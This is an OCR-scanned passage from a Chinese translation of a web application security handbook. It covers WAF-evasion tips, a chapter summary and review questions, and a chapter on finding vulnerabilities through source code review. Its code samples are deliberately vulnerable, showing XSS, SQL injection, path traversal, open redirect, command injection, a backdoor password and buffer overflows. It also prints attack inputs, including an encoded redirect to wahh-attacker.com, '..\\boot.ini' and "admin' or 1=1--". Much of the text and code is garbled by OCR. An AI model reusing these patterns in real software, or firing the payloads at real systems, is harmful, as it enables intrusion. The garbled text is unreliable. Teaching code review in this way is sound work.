中 不 可 能 存在 的 良性 字符 串 作 为 有 效 载 和 傈 。 根 据 定 义 ， 我 们 不 可 能 
提供 这 些 字 符 串 的 示例 。 但 是 ， 在 进行 文件 检索 时 ， 应 避免 
将 /etcpasswd 或 /windows/system32/config/sam 作 为 有 歼 载 何 。 此 外 ， 
应 在 XSS 攻 击 中 避免 使 用 <script>， 并 避免 将 alert() 或 xss 用 作 XSS 有 
效 载 何 。 

(2) 如 果 特 定 请 求 被 阻止 ， 可 以 尝试 在 其 他 位 置 或 上 下 文中 
提交 相同 的 参数 。 例 如 ， 在 GET 请 求 的 URL 中 、 在 POST 请 求 主体 
中 ， 以 及 在 POST 请 求 的 URL 中 提交 相同 的 参数 。 

(3) 此 外 ， 应 尝试 在 ASP.NET 上 将 参数 作为 cookie 提 交 。 如 果 
在 查询 字符 串 或 消息 主体 中 找 不 到 参数 foo，API 
Request.Params[“foo”] 会 检索 名 为 foo 有 的 cookie 的 值 。 

(4) 回顾 第 4 章 中 介绍 的 引入 用 户 输 入 的 所 有 其 他 方法 ， 选 择 
其 中 任何 不 受 保护 的 方法 。 

(5) 确定 以 非 标准 格式 (如 序列 化 或 编码 ) 或 可 能 以 此 类 格 
式 提交 用 户 输入 的 位 置 。 如 有 果 找 不 到 此 类 位 置 ， 可 以 通过 串联 字符 
串 和 /或 将 字符 串 分 布 到 多 个 参数 中 来 构建 攻击 字符 串 。 (注意 ， 如 
果 目 标 是 ASPNET， 可 以 使 用 HPP 通 过 同一 变量 的 各 种 变 体 来 串联 
攻击 字符 串 。) 


许多 部 署 了 Web 应 用 程序 防火 墙 或 IDS 的 组 织 并 没有 根据 本 世 介 绍 
的 方法 对 防御 设备 进行 有 针对 性 的 测试 ， 因 此 ， 在 针对 此 类 设备 实施 
攻击 时 ， 以 上 方法 通常 能 够 奏效 。 


18.4 小结 


与 Web 应 用 程序 上 运行 的 其 他 组 件 一 样 ，Web 服 务 絮 也 是 一 个 重 
要 的 受 攻 击 面 ， 通 过 它 攻击 者 可 以 攻破 整个 应 用 程序 。Web 服 务 右 中 
的 漏洞 可 使 攻击 者 访问 目录 列表 、 可 执行 页 面 的 源 代码 、 敏 感 配置 和 
运行 时 间 数 据 ， 并 避 开 输入 过 小 ， 直 接 威 胁 应 用 程序 的 安全 。 

由 于 存在 大 量 各 种 各 样 的 Web 服 务 器 产品 与 版 本 ， 碍 找 Web 服 务 
右 漏 洞 往 往 需 要 我 们 进行 一 定 程度 的 探索 与 研究 。 但 是 ， 使 用 目 动 化 
area 以 迅速 高 效 地 确定 所 攻击 的 服务 器 的 配置 与 软件 中 的 任何 
已 知 漏洞 


18.5 |P 


MA 


欲 知 问题 答案 ， 请 访问 http:/mdsec. net/wahh ° 
在 什么 情况 下 Web 服 务 器 会 显示 目录 列表 ? 


i 
1) 

] WebDAV 方 法 有 什么 作用 ? 为 什么 说 它们 会 造成 危险 ? 
3 

(4) 

(5) 


如 何 利 用 一 个 配置 成 Web 代 理 服 务 器 的 Web 服 务 器 ? 
何 为 Oracle PL/SQL 排 除 列表 ?如 何 避 开 这 个 列表 ? 
如 果 一 个 Web 上 服务器 允许 通过 HTTP 与 HTTPS 访 问 它 的 功 
0 当 查 询 漏洞 时 ， 使 用 其 中 一 个 协议 与 使 用 另 一 个 协议 相 比 有 哪些 
LAA? 


JZS 1k, 我 们 介绍 的 攻击 技巧 全 都 需要 与 一 个 正在 运行 的 应 用 
程序 进行 交互 ; 而且， 从 很 大 程度 上 讲 ， 这 些 攻 击 主要 由 癌 应 用 程序 
提 区 专门 设计 的 输入 和 监控 其 响应 这 两 个 步骤 构成 。 本 章 将 分 析 一 种 
截然 不 同 的 漏洞 查找 方法 : 通过 审查 应 用 程序 的 源 代码 来 查找 漏洞 。 

在 以 下 各 种 情况 下 ， 审 查 源 代码 有 助 于 渗透 测试 员 攻 击 目标 Web 
应 用 程序 。 

口 一 些 应 用 程序 为 开源 应 用 程序 ， 或 者 使 用 开源 组 件 ， 人 允许 从 相 
关 资 料 库 中 下 载 它们 的 源 代码 ， 并 从 中 寻找 漏洞。 

口 如 果 在 提供 咨询 服务 时 执行 渗透 测试 ， 应 用 程序 所 有 者 可 能 会 
允许 查看 应 用 程序 的 源 代 码 ， 以 提高 审计 的 效率 。 

口 可 能 在 应 用 程序 中 发 现 允 许 下 载 其 源 代码 的 文件 泄露 漏洞 。 

口 大 多 数 应 用 程序 使 用 某 种 客户 端 代码 ， 如 JavaScript; 不 需要 任 
何 权 限 即 可 访问 它 。 

人 们 和 旬 常 认为 ， 如 果 想 要 进行 代码 审查 ， 目 吴 必 须 是 一 名 经 验 丰 
富 的 程序 员 ， 并 深入 了 解 编写 代码 所 使 用 的 语言 。 然 而 ， 事 实 并 非 如 
此 。 一 些 编程 经 验 有 限 的 人 也 能 够 阅读 并 理解 许多 高 级 语言 同时， 
在 Web 应 用 程序 常用 的 各 种 语言 中 ， 许 多 类 型 的 漏洞 的 表现 形式 也 基 
本 相同 。 使 用 某 种 常规 方法 束 可 以 完成 绝 大 多 数 的 代码 审查 ， 而 且 还 
可 通过 使 用 说 明 帮 助理 解 所 针对 的 语言 与 环境 使 用 的 相关 语法 及 
API。 本 章 将 介绍 渗透 测试 员 所 需要 的 核心 方法 ， 并 提供 可 能 过 到 的 
一 些 语言 的 使 用 说 明 。 


19.1 代 查 


代码 审查 的 方法 很 多 ， 这 些 方法 有 助 于 提高 在 有 限 的 时 间 内 发 现 
安全 漏洞 的 效率 。 此 外 ， 还 可 以 将 代码 审 碍 与 其 他 测试 方法 结合 起 
来 ， 充 分 利用 每 种 方法 的 优势 。 


19.1.1 “ 黑 盒 ” 测 试 与 “ 白 盒 ”测试 


前 面 各 章 描述 的 攻击 方法 常 被 称 为 黑 盒 (black-box) 测试 方法 ， 
因为 它 主 要 从 外 部 攻击 应 用 程序 ， 并 监控 其 输入 与 输出 ， 而 之 前 并 不 
了 解 它 的 内 部 工作 机 制 。 相 反 ， 白 盒 (white-box) 方法 需要 分 析 应 用 
程序 的 内 部 运作 ， 碍 阅 所 有 设计 文档 、 源 代码 与 其 他 资料 。 

“和 白 盒 ” 代 码 审查 可 非常 高 效 地 发 现 应 用 程序 中 存在 的 漏洞 。 在 审 
查 源 代 码 的 过 程 中 ， 我 们 稍 常 可 以 迅速 确定 仅 使 用 "时 盒 ” 瓜 巧 很 难 或 
需要 很 长 时 间 才能 发 现 的 漏洞 。 例 如 ， 通 过 阅读 代码 可 迅速 确定 一 个 
可 访问 任何 用 户 账户 的 后 门 密码 ， 但 使 用 密码 猜测 攻击 几乎 不 可 能 发 
现 这 个 密码 。 

然而 ， 代 码 审查 并 不 能 完全 奉 代 “ 凌 盒 测试。 当然 ， 从 某 种 程度 
上 讲 ， 应 用 程序 中 的 全 部 漏洞 都 “存在 于 源 代 码 中 ” 因此， 理论 上 ， 
通过 代码 审查 可 以 确定 所 有 这 些 漏洞 。 但 是 ， 使 用 * 黑 盒 " 方 法 可 以 更 
迅速 、 高 效 地 发 现 许多 漏洞 。 举 例 来 说 ， 使 用 第 14 章 描述 的 目 动 化 模 
糊 测 试 技巧 ， 每 分 钟 可 以 同一 个 应 用 程序 发 送 数 百 个 测试 字符 串 ， 它 
们 将 迅速 分 散 到 所 有 相关 代码 路 径 中 ， 并 立即 返回 啊 应 。 另 外 ， 通 过 
[eS FB AC IS E AL Ue Ted AR AC ee, BY PL] DAE LEN HE A 
过 代码 审查 需要 数 天 才能 发 现 的 漏洞。 而 且 ， 许 多 企业 级 应 用 程序 的 
结构 极其 复杂 ， 对 用 户 提交 的 输入 进行 多 层 处 理 。 同 时 ， 应 用 程序 在 
每 一 个 层面 实施 不 同 的 控制 与 检查 ， 一 段 源 代码 中 的 明显 漏洞 可 能 会 
被 其 他 地 方 的 代码 完全 消除 。 

大 多 数 情 况 下 ,，“ 黑 盒 ” 与 “日 盒 ” 技 巧 可 以 相互 补充 ， 彼 此 强化 。 
通常 ， 通 过 代码 审查 初步 得 明 一 个 漏洞 后 ， 再 在 一 个 正在 运行 的 应 用 
程序 中 对 其 进行 测试 ， 有 是 确定 该 漏洞 是 否 真实 存在 的 最 简单 、 最 有 效 
的 方法 。 相 反 ， 在 一 个 正在 运行 的 应 用 程序 中 确定 某 种 反常 行为 后 ， 
审查 相关 源 代码 往往 是 确定 其 根本 原因 的 最 佳 途径 。 因此， 如 有 可 
能 ， 应 适当 结合 使 用 “ 黑 盒 ”与 “日 使” 的 技巧 ， 并 根据 实时 测试 过 程 中 


应 用 程序 的 反常 行为 、 源 代码 的 大 小 与 复杂 程度 ， 调 整 在 每 种 技巧 上 
投入 的 时 间 与 精力 。 


19.1.2 ”代码 审查 方法 


任何 功能 比较 强大 的 应 用 程序 都 可 能 包含 成 和 十 上 万 行 源 代码 ， 许 
多 情况 下 审查 代码 时 间 有 限 ， 可 能 仅 有 几 天 时 间 。 因 此 ， 有 效 代码 审 
查 的 一 个 关键 目标 是 ， 在 有 限 的 时 间 与 精力 条 件 下， 确定 尽 可 能 多 的 
安全 漏洞 。 为 了 实现 这 个 目标 ， 我 们 有 必要 采用 一 种 结构 化 的 方法 ， 
使 用 各 种 技巧 确保 迅速 确定 源 代码 中 存在 的 “明显 漏洞 "， 为 探查 更 微 
妙 、 更 难 发 现 的 漏洞 争取 更 多 时 间 。 

根据 我 们 的 经 验 ， 当 审查 Web 应 用 程序 产 代 码 时 ， 使 用 三 重 查 找 
方法 可 迅速 高 效 地 确定 其 中 存在 的 漏洞 。 这 种 方法 由 以 下 3 个 步 又 组 


成 

(1) 从 进入 点 开始 追踪 用 户 向 应 用 程序 提交 的 数据 ， 审 查 负 责 处 
理 这 些 数据 的 代码 。 

(2) 在 代码 中 搜索 表示 存在 常见 漏洞 的 签名 ， 并 审查 这 些 签 名 ， 
确定 某 个 漏洞 是 否 确实 存在 。 

(3) 对 内 在 危险 的 代码 进行 逐 行 审查 ， 理 解 应 用 程序 的 逻辑 ， 并 
确定 其 中 存在 的 所 有 问题 。 需 要 进行 仔细 审查 的 功能 组 件 包括 : 应 用 
程序 中 的 关键 安全 机 制 ( 验 证、 会 话 管理 、 访 问 控制 与 任何 应 用 程序 
范围 内 的 输入 确认 ) 、 外 部 组 件 接 口 ， 以 及 任何 使 用 本 地 代码 (通常 
为 C/C++) 的 情况 。 

首先 分 析 各 种 常见 的 Web 应 用 程序 漏 润 在 源 代 码 中 的 各 种 表现 形 
式 ， 以 及 当 进 行 代码 审查 时 如 何以 最 简单 的 方式 确定 这 些 表 现形 式 。 
2 eee Ee a 
码 | 第 (3) 步 | 。 

然后 依次 分 析 一 些 最 流行 的 Web 开 发 语言 ， 确 定 应 用 程序 如 何 获 
得 用 户 提 交 的 数据 (通过 请 求 参数 、cookie 等 ) 、 它 如 何 与 用 户 进行 
会 话 交 互 、 每 种 语言 中 存在 潜在 危险 的 API 以 及 每 种 语言 的 配置 与 环 
境 对 应 用 程序 安全 的 影响 。 这 将 有 助 于 我 们 从 进入 点 开始 追踪 用 户 向 
应 用 程序 提交 的 数据 | 第 (1) 步 | ， 并 为 其 他 步骤 提供 每 种 语言 的 参 
考 。 最 后 介绍 一 些 进行 代码 审查 的 有 用 工具 。 


TZ 注 解 当 进行 代码 审查 时 ， 应 该 始终 记 住 ， 应 用 程序 可 能 
扩展 了 类 库 与 接口 ， 对 标准 API 调 用 执行 了 包装 器 ， 并 对 安全 性 至 


关 重 要 的 任务 《如 保存 关于 每 个 会 话 的 信息 ) 采用 了 定制 机 制 。 在 
人 必须 了 解 这 些 定制 的 范围 ， 并 相应 调整 
审查 方法 。 


许多 类 型 的 Web 应 用 程序 漏洞 在 代码 中 都 有 相对 一 致 的 签名 ; 通 
常 ， 这 表示 通过 迅速 扫描 和 搜索 代码 就 可 以 确定 一 个 应 用 程序 中 存在 
的 大 部 分 漏洞 。 下 面 列 举 的 示例 出 现在 各 种 语言 中 ， 但 在 大 多 数 情况 
下 ， 签 名 是 不 区 分 语言 的 。 最 重要 的 是 程序 员 采 用 的 编程 技巧 ， 而 不 
是 实际 使 用 的 API 和 语法 。 


19.2.1 点 


在 非 音 明显 的 XSS 漏 洞 中 ， 用 户 收 到 的 HTML 代 码 的 一 部 分 明显 
征 由 用 户 可 控制 的 数据 构成 的 。 在 下 面 的 代码 中 ，HREF 链 接 的 目标 
即 由 从 请 求 查 询 字 符 串 中 直接 提取 的 字符 串 构 成 : 


String link = "<a href=" + HtcpUrility.UrlDecode (Request .QueryString 
("refURL"]) + "&SiteTD=" + SiteId + “&Path-" + HttpUriliry.UrlEncode 
{(Request.QueryString["Path"]) + "</a>"; 

objCell.innerHtml = link; 


这 时 ， 对 洪 在 恶意 的 内 容 进行 HTML 编 码 这 种 阻止 跨 站 点 脚本 的 
常用 方法 ， 并 不 适用 于 生成 的 串联 字符 串 ， 因 为 它 已 经 包含 有 效 的 
HTML 标 记 ; 任何 净化 数据 的 党 试 都 会 按 应 用 程序 指定 的 方式 对 
HTML 编 码 ， 从 而 中 断 应 用 程序 。 因 此 ， 这 个 示例 肯定 易于 受到 攻 
击 ， 除 非 在 其 他 地 方 实施 了 过 滤 ， 阻 止 了 在 查询 字符 串 中 包含 XSS 的 
请 求 。 这 种 使 用 过 滤 来 阻止 XSS 攻 击 的 方法 往往 存在 缺 了 史 ， 如 果 采 
en 

谷 o 

在 更 加 微妙 的 情况 下 ， 用 户 可 控制 的 数据 用 来 指定 随后 用 于 创建 
发 送 给 用 户 响应 的 一 个 变量 值 。 在 下 面 的 示例 中 ， 类 成 员 变 量 
m_pageTitle 被 设 定 为 从 请 求 查 询 字 符 串 中 提取 的 一 个 值 ， 随 后 将 用 于 
创建 被 返回 的 HTML 页 面 的 <title> 元 素 : 


private void setPageTitle(HttpServletRequest request) throws 


ServletException 

String requestType = request.getParameter{"type"); 

if ("3".equals({requestType) && null!=request.getParameter(”*title")) 
m_pageTitle = request.getParameter({"*title”); 


else m_vageTitle = "Online banking application’; 


} 


SEEMS, ze MU A Fa Be Be A 
m_pageTitle 变 量 的 处 理 过 程 ， 以 及 它 是 如 何 被 合并 到 被 返回 的 页 面 中 
的 ， 以 确定 数据 是 否 为 防止 XSS 攻 击 而 进行 了 适当 的 编码 。 

前 面 的 示例 明确 证 明代 码 审查 在 查找 一 些 漏洞 时 的 重要 作用 。 
XSS 漏 洞 只 有 在 一 个 不 同 的 参数 (type) 指定 一 个 特殊 的 值 (3) 时 才 
a 
漏洞 。 


19.2.2 ”SQL 注入 


如 果 各 种 硬 编码 的 字符 串 与 用 户 可 控制 的 数据 串联 成 一 个 SQL 硅 
询 ， 然 后 在 数据 库 内 执行 这 个 查询 ， 那 么 最 可 能 出 现 SQL 注 入 漏洞 。 
在 下 面 的 代码 中 ， 碍 询 由 直接 从 请 求 查 询 字 符 串 中 提取 的 数据 构成 : 


StringBuilder SalQuery = newStringBuilcder ("SELECT name, accno PROM 
TbhiCustomers WHERE " + SqlWhere); 
if (Request.QueryString[”"CID"] != null && 


Request.QueryString["PageId*] == "2") 


SciQuery.Appena{* AND CustomerID = * 
SqlQuery .Append (Request .QueryString["“CID*].ToString{)}); 


) 


在 源 代 码 中 搜索 彰 用 于 从 用 户 提交 的 输入 构建 查询 的 硬 编 码 子 字 
符 哩 ， 是 在 代码 中 迅速 确定 这 种 明显 调 洞 的 简单 方法 。 这 些 子 字 符 串 
通 音 由 SQL 代码 片断 组 成 ， 并 被 源 代 码 引 用 ; 因此 ， 寻 找 由 引号 、 
SQL 关 键 字 和 空格 组 成 的 适当 模式 可 能 会 有 用 。 例 如 : 


在 每 一 种 情况 中 ， 应 该 核实 将 这 些 字 符 串 与 用 户 可 控制 的 数据 哩 
联 是 否 会 引入 SQL 注入 漏洞 。 因 为 SQL 关键 字 区 分 大 小 写 ， 所 以 在 代 
码 中 搜索 这 些 关 键 字 时 也 应 区 分 大 小 写 。 请 注意 ， 为 减少 错误 警报 ， 
这 些 搜索 项 后 可 能 附加 了 空格 。 


19.2.3 ”路径 饥 历 


用 户 可 控制 的 输入 未 经 任何 输入 确认 ， 或 者 核实 已 经 选择 一 个 适 
当 的 文件 ， 束 被 传送 给 一 个 文件 系统 API， 这 是 路 径 遍 历 漏洞 的 常见 
签名 。 在 最 第 见 的 情况 下 ， 用 户 数据 附加 在 一 个 硬 编 码 或 系统 指定 的 
目 孙 路 径 之 后 ， 让 攻击 者 能 够 使 用 点 -点 - 斜 线 建立 目 永 树 ， 访 问 其 他 
目录 中 的 文件 = 例如: 


一 一 


public byte|] GetAttachment (HttpRequest Request) 


FileStream fsAttachment = new PileStream(SpreadsheetPath + 
Ettputility.UrlDeccde (Request .QueryString[*AttachName"]), 


FileMode.OGpen, FileAccess.Read, FileShare.Read); 


oytel] bAttachment = new byte[fsAttachment.Length]; 
fsAttachment.Read(FileContent, 0, 
Convert.ToInt32(fsAttachment.Length, 


CultureInfo.CurrentCulturé)} }; 


fsAttacnment.Cclose(}; 


return bAttachment; 


应 对 任何 允许 用 户 上 传 或 下 载 文件 的 应 用 程序 功能 进行 仔细 审 
查 ， 了 解 它 是 如 何 根据 用 户 提交 的 数据 调用 文件 系统 API 的 ， 并 确定 
是 否 可 以 使 用 专门 设计 的 输入 访问 其 他 位 置 的 文件 。 通 常 ， 通 过 在 代 
码 中 搜索 任何 与 文件 名 有 关 的 查询 字符 串 参 数 (在 本 例 中 为 
AttachName) ， 以 及 在 相关 语言 中 搜寻 所 有 文件 API 并 检查 提交 它们 
nas eee Nee ene (常用 语言 中 的 相关 API 列 表 
见 后 ° 


19.2.4 “任意 重 定向 


通过 源 代码 中 的 签名 常 可 轻易 确定 各 种 钓鱼 攻击 向 量 ， 如 任意 
定 癌 。 在 下 面 这 个 示例 中 ， 查 询 字 符 串 中 用 户 提 交 的 数据 被 用 于 构建 
一 个 URL， 用 户 即 被 重 定 癌 到 这 个 URL: 


private void handleCancel () 


f 
t 


httpResponse.Redirect (HttpUtility.UrlDecode (Recuest.QueryString[ 
*refURL"]) + "“&SiteCode=" + 
Request .QueryString["SiteCode"’].ToString() + 
*"&UserId=" + Request.QueryString|”UserlId"! .ToString({)); 


} 


通常 ， 检 查 客户 端 代码 即 可 发 现任 意 重 定 回 漏洞 ;当然 ， 这 并 不 
需要 了 解 应 用 程序 的 内 部 机 制 。 在 下 面 的 示例 中 ， 使 用 JavaScript 从 
URL 查 询 字 符 串 中 提取 一 个 参数 ， 并 最 终 重 定 癌 到 这 个 URL: 


url = document .URL; 


index = url.indexOf('?redir='); 
target = unescape(url.substring(index + 7, url.length)}; 
target = unescape(target); 


if ((index = target.indexOf({'//')) > 0) { 
target = target.substring (index + 2, target.length); 
index = target.indexOf({'/'); 
target = target.substring{index, target.length); 

} 

target = unescape(target); 

document.location = target; 


可 见 ， 这 上 段 脚 本 的 作者 已 意识 到 ， 该 脚本 可 能 会 成 为 指向 外 部 域 
的 一 个 绝对 URL 的 重 定 癌 攻击 的 目标 。 该 脚本 检查 重 定 癌 URL 是 否 包 
含 一 个 双 和 斜 线 〈 像 http:/ 中 一 样 ) ， 如 果 包 含 ， 束 省 略 第 一 个 单 斜 线 ， 
将 它 转换 成 一 个 相对 URL 。 但 是 ， 当 它 最 后 一 次 调用 unescape () 画 
数 时 ， 该 函数 将 对 任何 UREL 编 码 的 字符 进行 解码 。 确 认 后 再 执行 规范 
化 常常 会 导致 漏洞 产生 〈 请 参阅 第 2 章 了 解 相 关内 容 ) 。 在 这 个 示例 
ee ee a 
定 问 : 


?redir=http:%$25252£%25252 fwahh-attacker.com 


19.2.5 ”OS 命令 注入 


连接 到 外 部 系统 的 代码 中 常常 包含 指示 代码 注入 漏洞 的 签名 。 在 
下 面 的 a H, message“ 与 address 参 数 从 用 户 可 控制 的 表单 数据 中 提取 
出 来 ， 然 后 直接 传送 给 UNIX system API: 


void send mail {const char *message, const char *addr) 
char sencGMaiiCmdad([4096); 
snorintf (sendMai CmG, 4096, "echo ‘%s* sendmail %s”, message, aðr); 


system (sendMailcmd) ; 


return; 


19.2.6 后门 密 码 


除非 被 恶意 程序 员 有 意 隐 藏 ， 否 则 ， 当 审查 证 书 确认 人 逻辑 时 ， 用 
于 测试 或 管理 目的 的 后 门 密码 非常 容易 确定 。 例 如 : 


private UserProfile validateUser{String username, String password) 


UserProfile up = getUserProfile(username) ; 


i£ (checkCredentlalis({up, password) 
"“oculiomnium".equals (password) ) 


return up; 


return null; 


} 


RR. 使 用 这 种 方法 还 可 以 轻易 确定 未 引用 的 函数 与 隐藏 调试 参 


应 对 应 用 程序 使 用 的 任何 本 地 代码 进行 仔细 审查 ， 确 定 可 被 攻击 
者 用 于 执行 任意 代码 的 常见 漏洞 。 
1. 缓冲 区 溢出 漏洞 


这 些 漏洞 常常 使 用 一 个 未 经 检查 的 API 实 现 对 缓冲 区 的 操控 。 这 
些 API 数 量 众多 ， 包 括 strcpy、strcat、memcpy 与 sprintf 以 及 它们 的 
wide-char 和 其 他 变 体 。 确 定 代码 中 明显 的 缓冲 区 淤 出 漏洞 的 一 种 简单 
方法 是 ， 搜 索 所 有 这 些 API 的 用 法 ， 并 检 实 来 源 缓冲 区 是 否 可 由 用 户 
控制 ， 以 及 代码 是 否 已 经 明确 确定 目标 缓冲 区 足够 大 ， 能 够 容纳 被 复 
制 到 它 里 面 的 数据 (因为 API 不 会 这 样 做 ) 

我 们 可 以 轻易 确定 以 易 受 攻击 的 方式 调用 危险 API 的 做 法 。 在 下 
面 的 示例 中 ， 用 户 可 控制 的 字符 串 pszName 伞 复制 到 一 个 固定 大 小 的 
栈 缓冲 区 中 ， 但 之 前 并 没有 检查 该 缓冲 区 是 否 足 以 容纳 这 些 字符 串 : 


BOOL CALLBACK CFiles::EnumNameProc(LPTSTR pszName} 


char strFileName [MAX PATH]; 
strepy(strFileName, pszName)}); 


} 


TER, WAS EAAPIEM CRA AAPL, AAAH E 
傈 证 缓冲 区 次 出 不 会 改 生 。 有 时， 由 于 错误 或 误解 ， 一 个 经 过 检查 的 
API 以 危险 的 方式 被 使 用 ， 以 前 面 漏洞 的 “修复 代码 ”为 例 : 


BOOL CALLBACK CFiles::EnumNameProc(LPTSTR pszName) 


char strFileName [MAX PATH]; 


strnepy(strFileName, pszName, strlen(pszName}); 


} 


因此 ， 要 在 代码 中 彻底 搜索 缓冲 区 溢出 漏洞 ， 必 须 对 整个 代码 进 
行 仔细 地 逐 行 审查 ， 追 踪 对 用 户 可 控制 的 数据 执行 的 每 一 项 操作 。 

2. 整数 漏洞 

这 些 漏洞 的 表现 形式 各 异 ， 而 且 非 常 难以 检测 ， 但 有 时 通过 源 代 
码 中 的 签名 却 可 立即 确定 这 类 漏洞 。 

比较 有 符号 与 无 符号 的 整数 时 经 常会 出 现 问 题 。 以 下 代码 中 ， 上 
一 个 漏洞 的 “修复 代码 ”对 有 符号 的 整数 (en) 与 无 符号 的 整数 

(sizeof(strFileName)) 进行 比较 。 如 果 用 户 能 够 使 len 为 负 值 ， 这 个 比 

较 就 会 成 功 进行 ， 而 且 未 经 检查 的 strcpy 仍 会 运行 : 


BOOL CALLBACK CFiles::KnumNameProc{LPTSTR pszName, int len) 
char strFileName [MAX PATH]; 


if {len < sizecf (strFileName)) 


strepy(strFfileName, pszName) ; 


} 


3. 格式 化 字符 串 漏 洞 

通常 ， 通 过 检查 printf 与 FormatMessage 系 列 函 数 的 用 法 ， 如 果 发 
现 格式 化 字符 串 参 数 并 未 硬 编 码 ， 而 是 由 用 户 控制 ， 就 可 以 立即 确定 
这 类 漏洞 。 以 下 面 这 段 调用 fprintf 函 数 的 代码 为 例 : 


void logAuthenticationAttempt (char* username); 


char tmp[64]; 
snprintf(tmp, 64, “login attempt for: %s\n", username); 
tmp[63] = 0; 


fprintf{g_logFile, tmp); 


19.2.8” 源 代码 注释 


许多 软件 漏洞 可 以 从 源 代码 注释 中 发 现 。 如 采 开 发 者 意识 到 某 项 
操作 存在 危险 ， 并 在 代码 中 标注 提示 ， 准 备 以 后 修复 这 个 问题 ， 但 却 
从 未 着 手 修复 ， 这 时 就 会 出 现 以 上 和 情况。 另外， 如 采 测 试 时 确定 应 用 
程序 存在 某 种 反常 行为 ， 并 将 其 记录 在 注释 中 ， 但 同样 从 未 对 这 种 行 
为 进行 全 面 调查 ， 这 时 也 会 出 现 上 面 的 情况 。 例 如 ， 我 们 曾 在 一 个 应 
用 程序 的 生产 代码 中 遇 到 以 下 代码 ; 


char buf[200]; // I hope this is big enough 


strcpy (buf, userinput); 


在 代码 中 搜索 说 明和 常见 问题 的 注释 ， 往 往 可 以 迅速 发 现 许多 明显 
的 漏洞 。 下 面 是 一 些 已 证 明 有 用 的 搜索 项 : 

Dbug 

口 problem 


口 bad 

口 hope 

口 todo 

g fix 

g overflow 
g crash 

g inject 

g xss 

g trust 


19.3 Java 平台 


本 节 主 要 介绍 在 Java 平 台 上 获取 用 户 提交 的 输入 的 方法 、 与 用 户 


会 话 交 互 的 方式 、 存 在 的 洪 在 危险 的 API 以 及 与 安全 相关 的 配置 选 


项 。 


19.3.1 


ALP 


a) 


Java 应 用 程序 通过 javax.servlet.http.HttpServletRedquest 接 口 获取 用 
户 提交 的 输入 ， 该 接口 对 javax.servlet.ServletRequest 接 口 进 行 了 扩展 。 
这 两 个 接口 中 包含 了 大 量 Web 应 用 程序 用 于 访问 用 户 提 交 的 数据 的 
API。 表 19-1 列 出 的 API 可 用 于 获取 用 户 请 求 中 的 数据 。 


表 19-1 Java 平台 中 用 于 获取 用 户 提交 的 数据 的 API 


API 


getParameter 
getParameterNames 
getParameter Values 
getParameterMap 


getQueryString 


getHeader 
getHeaders 
getHeaderNames 


getRequestURI 
getRequestURL 


getCookies 


描 yÈ 
以 String 名 称 与 String 值 之 间 映 射 的 形式 保存 
URL 查 询 字 符 串 与 
POST 请 求 主体 中 的 参数 ， 使 用 这 些 APIH 以 访 
问 该 映射 
返回 请 求 中 的 整个 查询 字符 串 ， 可 以 它 代替 
getParameter API 
以 String 名 称 与 String 值 之 间 映 射 的 形式 保存 请 
求 中 的 HTTP 消息 头 ， 使 用 这 些 API 可 以 访问 该 


这 些 API 返 回 请 求 中 的 URL ， 包 括 查 询 字 符 串 


返回 Cookie 对 象 的 一 个 数组 ， 其 中 包含 请 求 所 
收 到 的 cookie 信 息 ， 包 括 
它们 的 名 称 与 值 


getRequestedSessionId 在 某 些 情况 下 用 来 殖 代 getCookies， 返 回 在 请 


求 中 提交 的 会 话 D 值 


getInputStream 这 些 API 返 回 客户 端 送出 的 原始 请 求 的 不 同 表 
getReader 示 形 式 ， 因 此 可 用 于 访问 其 
他 所 有 API 获 得 的 任何 信息 
getMethod 返回 HTTP 请 求 所 使 用 的 方法 
getProtocol 返回 HTTP 请 求 所 使 用 的 协议 
getServerName 返回 HTTP Host 消 息 头 的 值 
getRemoteUser 如 果 当 前 用 户 通 过 验证 ， 这 些 API 返 回 用 户 的 
getUserPrincipal 信息 ， 包 括 登 录 名 。 如果 用 


户 可 以 在 目 我 注册 过 程 中 选择 目 己 的 用 户 名 ， 
这 种 做 法 可 能 会 在 应 用 程 
序 的 处 理 过 程 中 引入 恶意 输入 


19.3.2 “会话 交互 


Java 平 台 应 用 程序 使 用 javax.servlet.http.HttpSession 接 口 保存 和 检 
索 当 前 会 话 中 的 信息 。 每 会 话 存储 (per-session storage) 是 字符 串 名 
则 的 一 个 映射 。 表 19-2 列 出 的 API 用 于 保存 和 检索 会 话 中 
的 数据 。 


表 19-2 Java 平台 中 用 于 与 用 户 会 话 交 互 的 API 


API tii = ult 
setAttribute 用 于 保存 当前 会 话 中 的 数据 
putValue 
getAttribute 用 于 查询 保存 在 当前 会 话 中 的 数据 
getValue 
getAttributeNames 
getValueNames 


19.3.3 ”潜在 危险 的 API 


IX SPR es OL Java API。 以 危险 的 方式 使 用 这 些 API 可 能 
会 造成 安全 漏洞 。 

1. 文件 访问 

在 Java 中 ， 用 于 访问 文件 与 目录 的 主要 的 类 为 java.io.File。 从 安全 
的 角度 看 ， 这 个 类 的 最 重要 的 用 法 是 调用 它 的 构造 函数 ， 该 构造 函数 
接受 一 个 父 目 永和 文件 名 ， 或 者 仅 为 一 个 路 径 名 。 

无 论 以 哪 种 方式 使 用 构造 本 数 ， 如 果 未 检查 其 中 是 否 包含 点 -点 - 
和 斜 线 序列 束 将 用 户 可 控制 的 数据 作为 文件 名 参数 提交 ， 那 么 可 能 会 造 
0 re o 例如， 下 面 的 代码 将 打开 Windows C:Kari A ae 
ha] : 


String userinput 


ni \\boot-ini"; 


File £ = new File("C:\\temp", userinput); 


在 Java 中 ， 常 用 于 读 取 与 写 入 文件 内 容 的 类 包括 : 

g java.io.FileInputStream 

g java.io.FileOutputStream 

g java.io.FileReader 

g java.io.FileWriter 

这 些 类 从 它们 的 构造 函数 中 提取 File 对 象 ， 或 者 通过 文件 名 字符 
串 打 开 文 件 。 如 果 用 户 可 控制 的 数据 作为 这 个 参数 提交， 同样 可 能 会 
引入 路 径 遇 历 漏 洞 。 例 如 : 


String userinput = "..\\boot.ini"; 


FPileIncutStream fis = new FileInputStream("C:\\temp\\" + userinput); 


2. 数据 库 访问 

下 面 这 些 是 常用 于 以 SQL 查 询 执行 任何 一 个 字符 串 的 API: 

g java.sql.Connection.createStatement 

g java.sql.Statement.execute 

g java.sql.Statement.executeQuery 

如 采用 户 提交 的 数据 属于 以 查询 执行 的 字符 串 的 一 部 分 ， 那 么 它 
可 能 易于 受到 SQL 注入 攻击 。 例 如 : 


String username = "adnin' or 1=1 


String password = "foo"; 
Statement s = connection.createStatement Í}; 
s.executeQuery ("SELECT * FROM users WHERE username = *' + username + 


' AND password = "' + password + 


它 执行 不 民 查 询 : 


SELECT * FROM users WHERE username = ‘admin' or 1=i--' AND password = ‘fico’ 


